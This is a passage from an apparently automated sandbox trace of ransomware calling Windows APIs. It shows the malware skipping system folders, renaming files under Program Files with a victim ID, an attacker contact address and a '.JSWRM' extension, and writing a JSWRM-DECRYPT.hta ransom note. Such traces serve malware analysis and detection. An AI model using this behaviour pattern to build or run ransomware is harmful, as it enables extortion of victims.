lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0069.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.191] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41dce0ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41dce0ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41dce0ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2=".") returned 1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="..") returned 1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="...") returned 1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="windows") returned -1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="recovery") returned -1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="perflogs") returned -1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="documents and settings") returned -1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="system volume information") returned -1 [0069.191] lstrcmpiW (lpString1="adcvbs.inc", lpString2="msocache") returned -1 [0069.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcvbs.inc", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcvbs.inc", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adcvbs.inc", lpUsedDefaultChar=0x0) returned 10 [0069.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcvbs.inc", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adcvbs.inc", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adcvbs.inc", lpUsedDefaultChar=0x0) returned 10 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.192] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.192] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9169171063542488) returned 0 [0069.192] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.192] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.192] CloseHandle (hObject=0xffffffff) returned 1 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0069.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0069.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.193] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d805e9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0069.193] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.195] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.195] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.196] CloseHandle (hObject=0x454) returned 1 [0069.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0069.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0069.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0069.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d805e9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe7f5d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0069.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.198] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d805e9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe7f5d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.198] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.198] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe7f5d1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fe7f5d1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fe7f5d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.198] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.199] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.199] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b99489e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2=".") returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="..") returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="...") returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="windows") returned -1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="recovery") returned -1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="perflogs") returned -1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="documents and settings") returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="system volume information") returned -1 [0069.199] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="msocache") returned -1 [0069.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcer.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcer.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcer.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.200] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0069.200] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.201] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.201] CloseHandle (hObject=0xffffffff) returned 1 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | 